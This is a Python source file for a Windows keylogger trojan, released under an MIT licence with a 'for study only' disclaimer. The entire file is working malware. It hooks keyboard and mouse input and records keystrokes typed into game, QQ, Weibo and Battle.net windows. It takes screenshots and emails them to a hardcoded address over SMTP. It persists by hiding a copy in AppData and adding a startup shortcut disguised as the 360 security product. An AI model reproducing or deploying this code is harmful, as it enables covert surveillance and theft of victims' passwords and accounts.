# -*- coding: cp936 -*- #
# A keyboard recording trojan
# Copyright (c) 2015 Jackeriss.
# Released under MIT license <http://opensource.org/licenses/MIT>
# 警告:本源码仅供学习交流使用,禁止用于任何非法用途!
"""
Author: Jackeriss
Email: i@jackeriss.com
Site: http://www.jackeriss.com
"""
import os
import time
import pythoncom
import shutil
import smtplib
import pyHook
from PIL import ImageGrab
from win32com.shell import shell
from win32com.shell import shellcon
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
sender = '123456789@qq.com'#邮件发送方
receiver = '123456789@qq.com'#邮件接收方
subject = 'python email test'
smtpserver = 'smtp.qq.com'#邮件服务器
username = '123456789'#邮件用户名
password = '1111111'#邮件密码
smtp = smtplib.SMTP()
startup_path = shell.SHGetPathFromIDList(shell.SHGetSpecialFolderLocation(0,shellcon.CSIDL_STARTUP))
appdata_path = shell.SHGetPathFromIDList(shell.SHGetSpecialFolderLocation(0,shellcon.CSIDL_APPDATA))
def set_shortcut(filename,lnkname,iconname):
shortcut = pythoncom.CoCreateInstance(
shell.CLSID_ShellLink, None,
pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink)
shortcut.SetPath(filename)
shortcut.SetIconLocation(iconname,0)
if os.path.splitext(lnkname)[-1] != '.lnk':
lnkname += ".lnk"
shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(lnkname,0)
#如果是远程监听某个电脑,可以将获取到的信息通过邮件发出去
def send_email(msg,file_name):
msgRoot = MIMEMultipart('related')
msgRoot['Subject'] = file_name#邮件标题
msgText = MIMEText('%s'%msg,'html','utf-8')#发送HTML形式的文字信息
msgRoot.attach(msgText)
att = MIMEText(open('%s'%file_name, 'rb').read(), 'base64', 'utf-8')#将屏幕截图作为附件
att["Content-Type"] = 'application/octet-stream'
att["Content-Disposition"] = 'attachment; filename="%s"'%file_name
msgRoot.attach(att)
while 1:
try:
smtp.sendmail(sender, receiver, msgRoot.as_string())
break
except:
try:
smtp.connect('smtp.qq.com')#尝试登陆SMTP邮件服务器
smtp.login(username, password)
except:
print "failed to login to smtp server"
path=os.getcwd()+"\\"+file_name#删除本地截图
if os.path.exists(path):
os.remove(path)
def onMouseEvent(event):
# 监听鼠标事件
global MSG
if len(MSG)!=0:
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic_name = "mouse_"+pic_name+".png"
pic = ImageGrab.grab()
pic.save('%s' % pic_name)#将用户屏幕截图,保存到本地
send_email(MSG,pic_name)
## write_msg_to_txt(MSG)
MSG=''
return True
def onKeyboardEvent(event):
#监听键盘事件
global MSG
title= event.WindowName.decode('GBK')
#通过窗口的title,判断当前窗口是否是“监听目标”
if title.find(u"魔兽世界") != -1 or title.find(u"英雄联盟") != -1 or title.find(u'QQ')!=-1 or title.find(u'微博')!=-1 or title.find(u'战网')!=-1:
#Ascii: 8-Backspace , 9-Tab ,13-Enter
if (127 >= event.Ascii > 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
if (event.Ascii == 9) or (event.Ascii == 13):
#屏幕抓图实现
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic_name = "keyboard_"+pic_name+".png"
pic = ImageGrab.grab()#保存成为以日期命名的图片
pic.save('%s' % pic_name)
send_email(MSG,pic_name)
## write_msg_to_txt(MSG)
MSG = ''
return True
if __name__ == "__main__":
icon_file=os.getcwd()+"\\"+"ABE.glj"#源图标位置
exe_file=os.getcwd()+"\\"+"开始游戏.exe"#源程序位置
icon_copy=appdata_path+"\\"+"360安全卫士.ico"#目标图标位置
exe_copy=appdata_path+"\\"+"youxun.exe"#目标程序位置
if os.path.exists(icon_file) and os.path.exists(exe_file):#源位置无误则复制到目标位置
shutil.copy(exe_file,exe_copy)
if os.path.exists(icon_copy) and os.path.exists(exe_copy):#一切顺利则设置隐藏和快捷方式
cmd1 = 'attrib +h "' + icon_copy +'"'
os.popen(cmd1).close()
cmd2 = 'attrib +h "' + exe_copy +'"'
os.popen(cmd2).close()
lnk_name=startup_path+"\\360安全卫士.lnk"
set_shortcut(exe_copy,lnk_name,icon_copy)
try:
smtp.connect('smtp.qq.com')#尝试登陆SMTP邮件服
smtp.login(username, password)
except:
print "failed to login to smtp server"
MSG = ''
#创建hook句柄
hm = pyHook.HookManager()
#监控鼠标
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
#监控键盘
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
#循环获取消息
pythoncom.PumpMessages()
